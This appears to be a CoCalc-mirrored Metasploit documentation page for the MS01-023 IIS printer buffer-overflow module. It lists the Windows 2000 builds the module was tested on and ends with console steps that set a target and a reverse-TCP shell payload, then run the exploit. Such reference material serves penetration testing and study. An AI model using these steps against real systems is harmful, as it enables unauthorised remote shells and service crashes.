CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/documentation/modules/exploit/windows/iis/ms01_023_printer.md
Views: 1904
Vulnerable Application
This exploits a buffer overflow in the request processor of the Internet Printing Protocol ISAPI module in IIS. This module works against Windows 2000 Server and Professional SP0-SP1.
If the service stops responding after a successful compromise, run the exploit a couple more times to completely kill the hung process.
This module has been tested successfully on:
Windows 2000 Professional SP0 (Dutch)
Windows 2000 Professional SP0 (Finnish)
Windows 2000 Professional SP0 (Greek)
Windows 2000 Professional SP0 (Korean)
Windows 2000 Professional SP0 (Turkish)
Windows 2000 Professional SP1 (Arabic)
Windows 2000 Professional SP1 (Czech)
Windows 2000 Professional SP1 (English)
Windows 2000 Professional SP1 (Greek)
Windows 2000 Server SP0 (Chinese)
Windows 2000 Server SP0 (Dutch)
Windows 2000 Server SP0 (English)
Windows 2000 Server SP0 (German)
Windows 2000 Server SP0 (Hungarian)
Windows 2000 Server SP0 (Italian)
Windows 2000 Server SP0 (Portuguese)
Windows 2000 Server SP0 (Spanish)
Windows 2000 Server SP0 (Turkish)
Windows 2000 Server SP1 (English)
Windows 2000 Server SP1 (French)
Windows 2000 Server SP1 (Swedish)
Verification Steps
use exploit/windows/iis/ms01_023_printer
set RHOSTS [IP]
show targets
to see the possible targetsset TARGET [TARGET]
set PAYLOAD windows/shell/reverse_tcp
set LHOST [IP]
run